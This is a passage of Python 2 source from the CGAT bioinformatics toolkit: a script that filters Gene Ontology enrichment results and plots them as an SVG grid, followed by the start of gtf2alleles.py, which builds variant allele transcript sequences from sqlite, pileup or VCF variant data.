d.mFoldChange = 1.0 + float(percentchange) / 100.0
data.append(d)
else:
for line in lines:
try:
(code, goid, scount, stotal, spercent, bcount, btotal, bpercent, ratio,
pover, punder, goid, category, description) = line[:-1].split("\t")[:14]
except ValueError:
raise ValueError("# parsing error in line: %s" % line[:-1])
if code == "+":
p = pover
else:
p = punder
d = DataPoint()
d.mAnnotation = description
d.mPValue = float(p)
d.mFoldChange = float(spercent) / float(bpercent)
data.append(d)
# apply filters
for c in delims:
for d in data:
d.mAnnotation = d.mAnnotation.split(c)[0]
for c in ignore:
for d in data:
d.mAnnotation = d.mAnnotation.replace(c, '')
ninput = len(data)
no_fdr = False
# apply filters
if ninput > 0:
if max_qvalue is not None:
if use_annotator_fdr:
pvalues = annotator_fdr.keys()
pvalues.sort()
pvalues.reverse()
for pvalue in pvalues:
try:
d = annotator_fdr[pvalue]["Significant"]
except KeyError:
continue
if d.mObserved == 0:
E.info("no data remaining after fdr filtering")
data = []
break
elif d.mAverage / d.mObserved < max_qvalue:
E.info("filtering with P-value of %f" % pvalue)
data = [x for x in data if x.mPValue < pvalue]
break
else:
E.warn("fdr could not be computed - compute more "
"samples (at P = %f, actual fdr=%f)" %
(pvalue, d.mAverage / d.mObserved))
no_fdr = True
if no_fdr:
if use_annotator_fdr:
E.info("estimating FDR from observed P-Values")
pvalues = [x.mPValue for x in data]
vlambda = numpy.arange(0, max(pvalues), 0.05)
try:
qvalues = Stats.doFDR(
pvalues, vlambda=vlambda, fdr_level=max_qvalue)
except ValueError, msg:
E.warn(
"fdr could not be computed - no filtering: %s" % msg)
no_fdr = True
else:
data = [x[0] for x in zip(data, qvalues.mPassed) if x[1]]
elif max_pvalue is not None:
data = [x for x in data if x.mPValue < max_pvalue]
if no_fdr:
data = []
nremoved = ninput - len(data)
return data, nremoved, no_fdr
# some definitions for the layout of the picture
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
PURPLE = (255, 0, 255)
GREY = (128, 128, 128)
MAX_GREY = 240
GREY_COLORS = map(lambda x: (x, x, x), range(0, MAX_GREY))
DEFAULT_XWIDTH = 500
DEFAULT_YWIDTH = 500
DEFAULT_LINE_DISTANCE = 10
DEFAULT_OFFSET_Y = 20
DEFAULT_BOX_WIDTH = 15
DEFAULT_LINE_SPACING = 40
DEFAULT_TEXT_DISTANCE = 40
DEFAULT_ANNOTATION_DISTANCE = 20
DEFAULT_LINE_WIDTH = 2
DEFAULT_SCALE_FACTOR = 1.0
DEFAULT_COLOR_SEQUENCE = BLACK
DEFAULT_COLOR_ANNOTATION = BLACK
class GoPlot:
def __init__(self,
row_names,
col_names,
thresholds_size,
thresholds_colour,
alt_colours,
template="screen",
max_pvalue=None,
max_qvalue=None,
mark_columns=None,
):
"""If max_pvalue and max_qvalue are given, they are
added to the footer.
If mark_columns is given, the columns for which
mark_columns is True are marked.
"""
self.mElements = []
self.mTemplate = template
# save row names
self.mRowNames = row_names
self.mColNames = col_names
# colours
self.startColour = RED
self.mMiddleColour = YELLOW
self.mStopColour = GREEN
self.mAltColours = alt_colours
# a space
self.mSeparator = 10
# info
self.mMaxPValue = max_pvalue
self.mMaxQValue = max_qvalue
# width and height of a row/column
# GAL changed; was 200
self.mRowHeight = 150
self.mColWidth = 200
# maximum size of a box
self.mMaxBoxSize = 140
self.mRevertSize = True
# Height and width get set
# GAL changed; was 2.0
self.mHeaderFontSize = self.mRowHeight / 1.5
self.mHeaderFont = "Verdana"
self.mThresholdsSize = thresholds_size
self.mThresholdsSizeTitle = "P-Values"
self.mThresholdsColour = thresholds_colour
self.mThresholdsColourTitle = "Fold change"
# write a grid line every five rows
self.mRowTicks = 5
self.mColTicks = 5
# footer
self.mFooterFrom = 10
self.mFooterFontSize = self.mRowHeight / 1.5
self.mFooterFont = "Verdana"
self.mFooter = None
# page margin
self.mBottomMargin = 300
# Title
self.mTitleFontSize = self.mRowHeight
self.mTitleFont = "Verdana"
self.mTitle = None
if self.mTemplate == "screen":
# screen is default
pass
elif self.mTemplate == "publication":
self.startColour = RED
self.mMiddleColour = WHITE
self.mStopColour = BLUE
self.mMarkColumns = mark_columns
if self.mMarkColumns:
assert len(self.mMarkColumns) == len(self.mColNames), \
"length of mark_columns must equal length of columns"
self.initializePlot()
def initializePlot(self):
"""set various coordinates in the plot."""
# height of col header
self.mHeaderHeight = max(
map(len, self.mColNames)) * self.mHeaderFontSize / 2
if self.mTitle:
self.mHeaderHeight += self.mSeparator + self.mTitleFontSize
# width of row header
self.mHeaderWidth = max(
map(len, self.mRowNames)) * self.mHeaderFontSize / 2
# height of footer:
self.mFooterHeight = 2 * \
max(self.mFooterFontSize, self.mMaxBoxSize) + self.mSeparator
if self.mFooter:
self.mFooterHeight += self.mSeparator + self.mFooterFontSize
# height and width of data section
        self.mDataWidth = len(self.mColNames) * self.mColWidth
        self.mDataHeight = len(self.mRowNames) * self.mRowHeight
# build coordinates for rows and columns
self.buildMapRow2Position()
self.buildMapCol2Position()
# build colour map
self.buildColourMap()
self.mPageWidth = self.mHeaderWidth + \
self.mDataWidth + 1 * self.mSeparator
self.mPageHeight = self.mHeaderHeight + self.mDataHeight + \
self.mFooterHeight + 2 * self.mSeparator + self.mBottomMargin
def setTitle(self, title):
"""set title."""
self.mTitle = title
def setFooter(self, footer):
"""set footer."""
self.mFooter = footer
def writeTitle(self):
"""write title into plot."""
if self.mTitle:
e = SVGdraw.text(self.mPageWidth / 2,
self.mTitleFontSize,
self.mTitle,
self.mTitleFontSize,
self.mTitleFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
self.mElements.append(e)
def buildColourMap(self):
"""build map of thresholds to colours.
This is two gradients:
1: first half: start to middle
2: second half: middle to end
"""
self.mColours = []
if self.mAltColours:
for colidx in range(len(self.mThresholdsColour) + 1):
col = colidx / (len(self.mThresholdsColour) - 0.0)
if col == 0.5:
x = 0
col0 = [0, 0, 0]
col1 = [0, 0, 0]
elif col < 0.5:
x = min(1, 1 - 2 * col)
col0 = [26, 0, 128]
col1 = [255, 0, 0]
else:
x = min(1, 2 * col - 1)
col0 = [26, 52, 13]
col1 = [230, 255, 52]
self.mColours.append((col0[0] + x * (col1[0] - col0[0]),
col0[1] + x * (col1[1] - col0[1]),
col0[2] + x * (col1[2] - col0[2])))
else:
num_steps = int(
math.floor((len(self.mThresholdsColour) + 1) / 2.0))
d = map(lambda x, y: (x - y) / num_steps,
self.mMiddleColour, self.startColour)
for x in range(num_steps):
self.mColours.append((self.startColour[0] + x * d[0],
self.startColour[1] + x * d[1],
self.startColour[2] + x * d[2]))
# self.mColours.append( self.mMiddleColour )
d = map(lambda x, y: (x - y) / num_steps,
self.mStopColour, self.mMiddleColour)
for x in range(1, num_steps):
self.mColours.append((self.mMiddleColour[0] + x * d[0],
self.mMiddleColour[1] + x * d[1],
self.mMiddleColour[2] + x * d[2]))
self.mColours.append(self.mStopColour)
def buildMapRow2Position(self):
# build map of row_name to row
self.mMapRow2Position = {}
offset = self.mHeaderHeight + self.mSeparator
for x in range(len(self.mRowNames)):
self.mMapRow2Position[
self.mRowNames[x]] = offset + x * self.mRowHeight
def buildMapCol2Position(self):
# build map of row_name to row
self.mMapCol2Position = {}
for x in range(len(self.mColNames)):
self.mMapCol2Position[self.mColNames[x]] = x * self.mColWidth
def addValue(self, row, col, size, colour_value):
"""add a dot in row/col.
"""
# decide the size of the box
pos = bisect.bisect(self.mThresholdsSize, size)
if self.mRevertSize:
size = self.mMaxBoxSize * \
(1.0 - float(pos) / len(self.mThresholdsSize))
else:
size = self.mMaxBoxSize * float(pos) / len(self.mThresholdsSize)
d = (self.mMaxBoxSize - size) / 2
x = self.mMapCol2Position[col] + d
try:
y = self.mMapRow2Position[row] + d
except KeyError:
return
# determine the colour of the box
pos = bisect.bisect(self.mThresholdsColour, colour_value)
colour = self.mColours[pos]
e = SVGdraw.rect(x, y,
size, size,
stroke="black",
fill="rgb(%i,%i,%i)" % colour)
self.mElements.append(e)
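    # Illustrative sizing (assumed thresholds_size=[0.001, 0.01, 0.05] and
    # mRevertSize=True as set in __init__): a P-value of 0.005 bisects to
    # position 1, so addValue draws the box at 2/3 of mMaxBoxSize; smaller
    # P-values therefore produce larger boxes.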
def writeColHeaders(self):
"""write row headers."""
current_x = self.mColWidth / 2
current_y = self.mHeaderHeight
for i in range(len(self.mColNames)):
if self.mMarkColumns and self.mMarkColumns[i]:
color = BLUE
name = self.mColNames[i] + "*"
else:
color = BLACK
name = self.mColNames[i]
e = SVGdraw.text(
current_x,
current_y,
name,
self.mHeaderFontSize,
self.mHeaderFont,
stroke="rgb(%i,%i,%i)" % color,
text_anchor="start",
transform="rotate(-45,%i,%i)" % (current_x, current_y))
self.mElements.append(e)
current_x += self.mColWidth
# current_y -= self.mColWidth / 2 # GAL added # AH removed?
def writeGrid(self):
"""add grid lines."""
if self.mRowTicks:
            start_x = 0
end_x = self.mDataWidth + self.mSeparator + self.mHeaderWidth
current_y = self.mHeaderHeight + self.mSeparator / \
2 + self.mRowTicks * self.mRowHeight
for x in range(self.mRowTicks, len(self.mRowNames),
self.mRowTicks):
e = SVGdraw.line(start_x,
current_y,
end_x,
current_y,
stroke="rgb(%i,%i,%i)" % BLACK)
self.mElements.append(e)
current_y += self.mRowTicks * self.mRowHeight
if self.mColTicks:
start_y = self.mHeaderHeight + self.mSeparator / 2
end_y = start_y + self.mDataHeight
current_x = self.mColTicks * self.mColWidth - self.mColWidth / 2
for x in range(self.mColTicks, len(self.mColNames),
self.mColTicks):
e = SVGdraw.line(current_x,
start_y,
current_x,
end_y,
stroke="rgb(%i,%i,%i)" % BLACK)
self.mElements.append(e)
current_x += self.mColTicks * self.mColWidth
def writeRowHeaders(self):
"""write row headers."""
current_x = self.mDataWidth + self.mSeparator
current_y = self.mHeaderHeight + self.mSeparator + self.mHeaderFontSize
for name in self.mRowNames:
e = SVGdraw.text(current_x,
current_y,
name,
self.mHeaderFontSize,
self.mHeaderFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
self.mElements.append(e)
current_y += self.mRowHeight
self.mHeaderWidth = max(
map(len, self.mRowNames)) * self.mHeaderFontSize / 2
def writeFooter(self):
"""write footer.
The footer contains the legend.
"""
current_x = self.mFooterFrom
current_y = self.mHeaderHeight + self.mDataHeight + 2 * self.mSeparator
###########################################################
# Draw legend 1: size of boxes
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
self.mThresholdsSizeTitle,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(self.mThresholdsSizeTitle) * \
self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
l = len(self.mThresholdsSize)
for x in range(l):
if self.mRevertSize:
p = int(self.mMaxBoxSize * (1.0 - float(x) / l))
else:
p = int(self.mMaxBoxSize * (float(x) / l))
e = SVGdraw.rect(current_x,
current_y + (self.mMaxBoxSize - p) / 2,
p, p,
stroke="black",
fill="rgb(%i,%i,%i)" % self.startColour)
self.mElements.append(e)
current_x += self.mMaxBoxSize + self.mSeparator
t = "< %g" % (self.mThresholdsSize[x])
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
t,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(t) * self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
###########################################################
# Draw legend 2: colour of boxes
current_x = self.mFooterFrom
current_y += max(self.mFooterFontSize, self.mMaxBoxSize) + \
self.mSeparator
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
self.mThresholdsColourTitle,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(self.mThresholdsColourTitle) * \
self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
l = len(self.mThresholdsColour)
for x in range(l + 1):
p = self.mMaxBoxSize
if x < l:
t = "< %g" % (self.mThresholdsColour[x])
else:
t = "> %g" % (self.mThresholdsColour[x - 1])
e = SVGdraw.rect(current_x,
current_y,
p, p,
stroke="black",
fill="rgb(%i,%i,%i)" % self.mColours[x])
self.mElements.append(e)
current_x += self.mMaxBoxSize + self.mSeparator
e = SVGdraw.text(current_x,
current_y + self.mFooterFontSize,
t,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="start")
current_x += len(t) * self.mFooterFontSize / 1.5 + self.mSeparator
self.mElements.append(e)
###########################################################
if self.mMaxPValue is not None or self.mMaxQValue is not None:
current_y += max(self.mFooterFontSize / 1.5,
self.mMaxBoxSize) + self.mSeparator
a = []
if self.mMaxPValue:
a.append("P < %6.4f" % self.mMaxPValue)
if self.mMaxQValue:
a.append("FDR = %6.4f" % self.mMaxQValue)
e = SVGdraw.text(self.mPageWidth / 2,
current_y + self.mFooterFontSize,
" ".join(a),
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
###########################################################
if self.mFooter:
current_y += max(self.mFooterFontSize / 1.5,
self.mMaxBoxSize) + self.mSeparator
e = SVGdraw.text(self.mPageWidth / 2,
current_y + self.mFooterFontSize,
self.mFooter,
self.mFooterFontSize,
self.mFooterFont,
stroke="rgb(%i,%i,%i)" % BLACK,
text_anchor="middle")
self.mElements.append(e)
def finalizePlot(self):
"""write remaining parts of the plot."""
self.writeGrid()
self.writeTitle()
self.writeFooter()
self.writeRowHeaders()
self.writeColHeaders()
def writeToFile(self, outfile):
"""write svg image to file.
"""
self.finalizePlot()
self.mRoot = SVGdraw.drawing()
self.mDraw = SVGdraw.svg(
(0, 0, self.mPageWidth, self.mPageHeight), "100%", "100%")
for e in self.mElements:
self.mDraw.addElement(e)
self.mRoot.setSVG(self.mDraw)
tfile = tempfile.mktemp()
self.mRoot.toXml(tfile)
lines = open(tfile, "r").readlines()
        outfile.write("".join(lines))
outfile.write("\n")
os.remove(tfile)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id")
parser.add_option("-e", "--header-names", dest="headers", action="store_true",
help="first row is a header [ignored].")
parser.add_option("-t", "--title", dest="title", type="string",
help="page title.")
parser.add_option("-f", "--footer", dest="footer", type="string",
help="page footer.")
parser.add_option("--maxP", dest="max_pvalue", type="float",
help="maximum P-value displayed [default=%default].")
parser.add_option("--maxQ", dest="max_qvalue", type="float",
help="maximum Q-value for controlling for FDR [default=%default].")
parser.add_option("-c", "--column-titles", dest="col_names", type="string",
help="comma separated list of column titles [default: use filenames].")
parser.add_option("-p", "--pattern-filename", dest="pattern_filename", type="string",
help="pattern to map columns to filename.")
parser.add_option("-A", "--Annotator", dest="annotator", action="store_true",
help="use Annotator-style input files.")
parser.add_option("--annotator-fdr", dest="annotator_fdr", action="store_true",
help="use fdr computed from annotator [default=%default].")
parser.add_option("-T", "--thresholds", dest="thresholds", type="string",
help="7 comma-separated fold-change threshold values")
parser.add_option("-P", "--pvalues", dest="pvalues", type="string",
help="6 comma-separated p value threshold values"),
parser.add_option("-C", "--altcolours", dest="altcolours", action="store_true",
help="Use alternative colour palette")
parser.add_option("-X", "--delimiters", dest="delims", type="string",
help="Delimiter characters for annotation label")
parser.add_option("-Z", "--ignore", dest="ignore", type="string",
help="Ignored characters in annotation label")
parser.add_option("--fdr", dest="fdr", type="float",
help="filter output by FDR (requires annotator output). [default=%default]")
parser.add_option("-a", "--template", dest="template", type="choice",
choices=("screen", "publication"),
help="layout template to choose - affects colours.")
parser.add_option("--sort-columns", dest="sort_columns", type="choice",
choices=("unsorted", "similarity", "alphabetical", ),
help="sort columns. The default, unsorted, list columns in the order that they are supplied on the command line [default=%default]")
parser.set_defaults(
sortAlphabetically=True,
headers=False,
col_names="",
pattern_filename=None,
title="",
footer="",
max_pvalue=None,
max_qvalue=None,
annotator=False,
thresholds="0.25,0.33,0.5,1.0,2.0,3.0,4.0",
pvalues="0.00001,0.0001,0.001,0.01,0.1",
altcolours=False,
delims="",
ignore="",
template="screen",
annotator_fdr=False,
fdr=None,
sort_columns="unsorted",
)
(options, args) = E.Start(parser, add_pipe_options=True)
if len(args) == 0:
raise IOError("Please supply at least one input file.")
if options.pattern_filename:
input = []
col_names = args
for x in col_names:
input.append(options.pattern_filename % x)
else:
input = args
if options.col_names:
col_names = options.col_names.split(",")
if len(col_names) != len(input):
raise ValueError(
"Number of col_names and files different: %i != %i" %
(len(col_names), len(input)))
else:
col_names = input
E.info("reading data for %i columns" % len(input))
columns = []
errors = []
for col_name, filename in zip(col_names, input):
E.debug("reading data for column %s from %s " % (col_name, filename))
# collect all columns
try:
values, nremoved, no_fdr = Collect(
open(filename, "r"),
with_headers=options.headers,
annotator_format=options.annotator,
delims=options.delims,
ignore=options.ignore,
use_annotator_fdr=options.annotator_fdr,
max_pvalue=options.max_pvalue,
max_qvalue=options.max_qvalue)
except IOError:
E.warn("no data from %s" % filename)
values = []
no_fdr = False
nremoved = 0
E.info("read %i values from %s: %i significant, %i removed" %
(len(values) + nremoved, filename,
len(values),
nremoved))
columns.append((col_name, values))
errors.append(no_fdr)
    if sum([len(values) for _, values in columns]) == 0:
raise IOError("no data read - please check supplied files.")
# collect all annotations
# Also filter for max pvalue
annotations = set()
for col_name, column in columns:
for d in column:
annotations.add(d.mAnnotation)
E.info("There are %i rows" % len(annotations))
# sort and filter annotations
# (Code removed which did some filtering; the annotations data is not used)
# By removing labels from annlist you can select the annotations you want
# to display
row_names = list(annotations)
if options.sortAlphabetically:
row_names.sort()
if options.sort_columns == "unsorted":
pass
elif options.sort_columns == "alphabetical":
col_names.sort()
elif options.sort_columns == "similarity":
if len(row_names) * len(col_names) > 10000:
E.info("no sorting as matrix too large")
else:
matrix = numpy.ones((len(row_names), len(col_names)), numpy.float)
map_rows = dict(zip(row_names, range(len(row_names))))
x = 0
for col_name, column in columns:
for d in column:
matrix[map_rows[d.mAnnotation], x] = d.mFoldChange
x += 1
row_indices, col_indices = CorrespondenceAnalysis.GetIndices(
matrix)
map_row_new2old = numpy.argsort(row_indices)
map_col_new2old = numpy.argsort(col_indices)
row_names = [row_names[map_row_new2old[x]]
for x in range(len(row_names))]
col_names = [col_names[map_col_new2old[x]]
for x in range(len(col_names))]
E.info("columns have been sorted")
plot = GoPlot(row_names,
col_names,
thresholds_size=tuple(
map(float, options.pvalues.split(','))),
thresholds_colour=tuple(
map(float, options.thresholds.split(','))),
template=options.template,
alt_colours=options.altcolours,
max_pvalue=options.max_pvalue,
max_qvalue=options.max_qvalue,
mark_columns=errors)
if options.title:
plot.setTitle(options.title)
if options.footer:
plot.setFooter(options.footer)
plot.initializePlot()
for col_name, column in columns:
for d in column:
plot.addValue(d.mAnnotation,
col_name,
d.mPValue,
d.mFoldChange)
plot.writeToFile(options.stdout)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2alleles.py
```python
import sys
import collections
import sqlite3
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
import CGAT.GTF as GTF
import CGAT.Blat as Blat
import CGAT.Variants as Variants
import alignlib_lite
import pysam
Allele = collections.namedtuple('Allele',
'''cds,
peptide,
nexons,
cds_starts,
exon_starts,
frames,
is_nmd_knockout,
is_splice_truncated,
is_stop_truncated,
nframeshifts,
ncorrected_frameshifts,
                                nuncorrected_frameshifts,
peptide_first_stop,
peptide_len,
cds_first_stop,
cds_len,
reference_first_stop_start,
reference_first_stop_end,
cds_original_len,
nsplice_noncanonical,
''')
class VariantGetter(object):
'''base class for objects returning variants.'''
pass
class VariantGetterSqlite(VariantGetter):
'''retrieve variants from an sqlite table in pileup format.'''
def __init__(self, dbname, tablename):
self.dbname = dbname
self.tablename = tablename
self.dbhandle = sqlite3.connect(dbname)
self.statement = '''SELECT
pos, reference, genotype
FROM %(tablename)s
WHERE contig = '%(contig)s' AND
pos BETWEEN %(start)s and %(end)s
'''
def __call__(self, contig, start, end):
cc = self.dbhandle.cursor()
tablename = self.tablename
cc.execute(self.statement % locals())
variants = map(Variants.Variant._make, cc.fetchall())
cc.close()
return variants
class VariantGetterPileup(VariantGetter):
'''retrieve variants from file in pileup format.'''
def __init__(self, filename):
self.tabix = pysam.Tabixfile(filename)
self.contigs = set(self.tabix.contigs)
def __call__(self, contig, start, end):
variants = []
if contig not in self.contigs:
return []
for line in self.tabix.fetch(contig, start, end):
data = line[:-1].split()
contig, pos, reference, genotype = data[:4]
            # convert 1-based pileup coordinates to 0-based coordinates
pos = int(pos) - 1
variants.append(Variants.Variant._make((pos, reference, genotype)))
return variants
class VariantGetterVCF(VariantGetter):
'''retrieve variants from tabix indexed vcf file.'''
def __init__(self, filename, sample):
self.sample = sample
self.vcf = pysam.VCF()
self.vcf.connect(filename)
if sample not in self.vcf.getsamples():
            raise KeyError("sample %s not in vcf file" % sample)
def __call__(self, contig, start, end):
variants = []
s = self.sample
try:
iter = self.vcf.fetch(contig, start, end)
except ValueError:
# contigs not in variants, ignore
return variants
for row in iter:
result = pysam.Pileup.vcf2pileup(row, s)
if not result:
continue
variants.append(
Variants.Variant._make((result.pos, result.reference_base, result.genotype)))
return variants
def collectExonIntronSequences(transcripts, fasta):
    '''collect all the wild-type sequences for exons and introns.
    Exons and introns are indexed by their respective positions.
    The function changes the coordinates in ``transcripts`` to
    reverse coordinates in place.
    '''
contig = transcripts[0][0].contig
strand = transcripts[0][0].strand
lcontig = fasta.getLength(contig)
all_exons, all_introns = {}, {}
for exons in transcripts:
for exon in exons:
exon.invert(lcontig)
start, end = exon.start, exon.end
key = start, end
if key not in all_exons:
all_exons[key] = fasta.getSequence(
contig, strand, start, end).lower()
intron_intervals = GTF.toIntronIntervals(exons)
for start, end in intron_intervals:
key = start, end
if key not in all_introns:
all_introns[key] = fasta.getSequence(
contig, strand, start, end).lower()
return all_exons, all_introns
def buildCompactVariantSequences(variants, sequences):
'''build variant sequences by inserting ``variants`` into ``sequences``.
The original frame of the sequence is maintained by
converting the input sequence to a list. Each entry
in the list corresponds to a position in a wild type.
The wild type (WT) sequence is lower case
SNP: variant (ambiguity codes for variants)
homozygous insertion: upper-case bases after lower-case (WT) base
heterozygous insertion: lower-case bases after lower-case (WT) base
homozygous deletion: empty fields
heterozygous deletion: "-" after lower-case (WT) base
returns a dictionary of lists.
'''
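    # Hedged illustration of the encoding above (positions and bases are
    # made up, not taken from the original source). For a wild-type exon
    # "acgt" stored under key (100, 104):
    #   homozygous SNP c->T at 101            -> ['a', 'T', 'g', 't']
    #   homozygous deletion of the base at 102 -> ['a', 'c', '', 't']
    #   heterozygous deletion of the base at 102 -> ['a', 'c', 'g-', 't']
    #   homozygous insertion of TT after 101   -> ['a', 'cTT', 'g', 't']
    # Joining the list with "".join() yields the variant sequence, while
    # the list indices keep the original wild-type frame.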
result = {}
for key, sequence in sequences.iteritems():
variant_seq = list(sequence.lower())
start, end = key
# get all variants that overlap with sequences
for var_start, var_end, values in variants.find(start, end):
reference, action, has_wildtype, variantseqs = values
is_homozygous = len(variantseqs) == 1 and not has_wildtype
rel_start, rel_end = var_start - start, var_end - start
startoffset = max(0, start - var_start)
endoffset = max(0, var_end - end)
if action == "=":
assert rel_start >= 0
assert sequence[rel_start].upper() == reference, \
'reference base mismatch: expected %s, got %s at %i-%i' % \
(sequence[rel_start].upper(), reference,
var_start, var_end)
if is_homozygous:
variant_seq[rel_start] = variantseqs[0]
else:
variant_seq[rel_start] = Genomics.resolveReverseAmbiguousNA(
"".join(variantseqs))
elif action == "-":
xstart, xend = max(0, rel_start), min(len(sequence), rel_end)
for variant in variantseqs:
# truncated for variants of unequal lengths (-AA/-AAA)
refseq = sequence[xstart:xend].upper()[:len(variant)]
assert refseq == variant[startoffset:len(variant) - endoffset], \
'reference base mismatch at deletion: expected %s %s %s, got %s[%i:%i] at %i-%i (%i-%i), action=%s' % \
(sequence[xstart - 10:xstart],
refseq,
sequence[xend:xend + 10],
variant, startoffset, len(variant) - endoffset,
var_start, var_end, start, end,
action)
l = len(variant) - startoffset - endoffset
if is_homozygous:
variant_seq[xstart:xend] = [""] * l
else:
for x in range(xstart, xend):
if variant_seq[x].endswith("-"):
assert not has_wildtype
variant_seq[x] = ""
else:
variant_seq[x] += "-"
elif action == "+":
if is_homozygous:
variant_seq[rel_start] += variantseqs[0].upper()
else:
if has_wildtype:
variant_seq[rel_start] += variantseqs[0].upper()
else:
# merge indels like +AAA/+AA
a, b = variantseqs
if a.startswith(b):
variant_seq[
rel_start] += b.upper() + a[len(b):].lower()
elif b.startswith(a):
variant_seq[
rel_start] += a.upper() + b[len(a):].lower()
else:
raise ValueError(
"don't know how to encode variant: %s" % variantseqs)
result[(start, end)] = variant_seq
return result
def buildVariantSequences(indexed_variants, sequences):
'''build variant sequences by inserting ``variants`` into ``sequences``.
For each sequence, two alleles are returned. Both alleles are initialized
as wildtype sequences. In the absence of any phasing information, variants
are preferably added to the second allele, such that the wild-type status
of the first allele is preserved as much as possible
returns a dictionary of lists.
'''
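    # Hedged sketch of the expected result shape (the actual allele
    # construction happens in Variants.buildAlleles, which is not shown
    # here): each value of the returned dictionary is a pair
    # (allele1, allele2) of per-position string lists in the same compact
    # encoding as above; for a heterozygous variant the first allele would
    # typically stay wild type while the second carries the variant.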
result = {}
for key, sequence in sequences.iteritems():
feature_start, feature_end = key
variants = [
(x, y,) + z for (x, y, z) in indexed_variants.find(feature_start, feature_end)]
allele1, allele2 = Variants.buildAlleles(sequence,
variants,
reference_start=feature_start)
result[(feature_start, feature_end)] = (allele1, allele2)
return result
def buildCDSSequence(transcript, exons):
'''build transcript sequences from exons.'''
cds = []
for exon in transcript:
cds.append(exons[exon.start, exon.end])
return "".join(cds)
def buildAlleles(transcript,
variant_exons,
variant_introns,
reference_exons,
reference_introns,
offsets,
is_seleno=False,
frameshiftsize=5,
reference_coordinates=False):
    '''reconstitute variant transcript sequences from
    variant exons and introns. This method returns alleles
    as they are estimated to look, taking into account
    splice effects and nonsense-mediated decay (NMD).
    Transcripts are built in the following way:
    1. The exonic sequences are examined for stop codons.
    If they contain a stop codon in the last exon, the sequence
    is truncated at the stop. If a stop codon exists in an exon
    before the last exon, the allele is assumed to have been
    knocked out due to NMD and is set to the empty sequence.
    2. If a splice site is disrupted, the transcript is
    truncated (it is not extended to the first stop, as
    splicing might be recovered).
    If ``variant_exons`` and ``variant_introns`` are set to
    None, the two wild-type alleles are returned.
    Scenarios that this method ignores:
    1. Insertions after the 3' splice site are counted as belonging
    to the intron and not the exon, though they could be either.
    2. Insertions before the 5' splice site are counted as belonging
    to the exon and not the intron.
    If ``reference_coordinates`` is set to True, exon coordinates are
    taken from the reference. This ensures that a base that is
    derived from the same reference sequence gets the same coordinate
    in the two alleles. The alternative is allelic coordinates, which
    take intron size changes into account. For example, the reference
    has two exons, (100,200) and (300,400). Due to variants, the
    first allele now has an intron size of 110. Thus, in allelic
    coordinates, the coordinates are ((100,200), (310,410)) and
    ((100,200), (300,400)), while in reference coordinates both
    alleles would have the same coordinates. Note that due to
    insertions/deletions, the coordinates might change within an
    exon, too.
    returns two alleles.
    '''
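    # Hedged usage sketch, mirroring the call in main() further below:
    #
    #   alleles = buildAlleles(transcript,
    #                          variant_exons, variant_introns,
    #                          all_exons, all_introns,
    #                          offsets)
    #   (allele1, map1), (allele2, map2) = alleles
    #
    # Each element is a tuple of an Allele namedtuple and an alignlib_lite
    # alignment mapping the allele CDS to the reference. If no variants
    # were supplied, the same wild-type allele is returned twice.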
result = []
def _buildAllele(allele_id,
transcript, exons,
introns, offsets,
virtual_coordinates=False,
reference_exons=None):
def _getOffset(pos, offsets):
x = 0
while x < len(offsets) and offsets[x][0] <= pos:
x += 1
x -= 1
if x >= 0:
return offsets[x][1]
else:
return 0
def _sumIndels(ss):
'''sum indels within ss'''
c = 0
for s in ss:
c += len(s) - 1
return c
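        # Hedged example for _sumIndels above (values made up): for the
        # compact exon encoding ['a', 'cTT', '', 'g'] the net indel count
        # is (1-1) + (3-1) + (0-1) + (1-1) = 1, i.e. a 2 bp insertion and
        # a 1 bp deletion leave the sequence one base longer than wild type.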
def _getEndOffsets(ss):
'''get the offset at exons due to deletions at
start/end of exon.'''
l = len(ss)
x = 0
while x < l and ss[x] == "":
x += 1
start_offset = x
x = l - 1
while x >= 0 and ss[x] == "":
x -= 1
if x >= 0:
return start_offset, (l - 1) - x
else:
return start_offset, 0
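        # Hedged example for _getEndOffsets above (values made up):
        # ['', '', 'a', 'c', ''] -> (2, 1), i.e. two bases deleted at the
        # exon start and one base deleted at the exon end.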
def _addCds2Reference(map_cds2reference,
cds_start,
cds_seq,
reference_start):
'''add cds to reference'''
c, r = cds_start, reference_start
for x in cds_seq:
l = len(x)
if l == 0:
r += 1
else:
map_cds2reference.addPair(c, r)
c += l
r += 1
# counts
is_splice_truncated = False
is_nmd_knockout = False
is_stop_truncated = False
nuncorrected_frameshifts = 0
ncorrected_frameshifts = 0
nframeshifts = 0
nsplice_noncanonical = 0
reference_first_stop_start = -1
reference_first_stop_end = -1
# map between the new cds sequence and the reference
# sequence
map_cds2reference = alignlib_lite.py_makeAlignmentBlocks()
###################################################
# process first exon
exon = transcript[0]
transcript_id = exon.transcript_id
# collect offset for exon.start
genome_start = exon.start
genome_start += _getOffset(genome_start, offsets)
lcds, cds = 0, []
cds_starts = [0]
# still need to deal with deletions of first base:
exon_starts = [genome_start]
exon_key = (exon.start, exon.end)
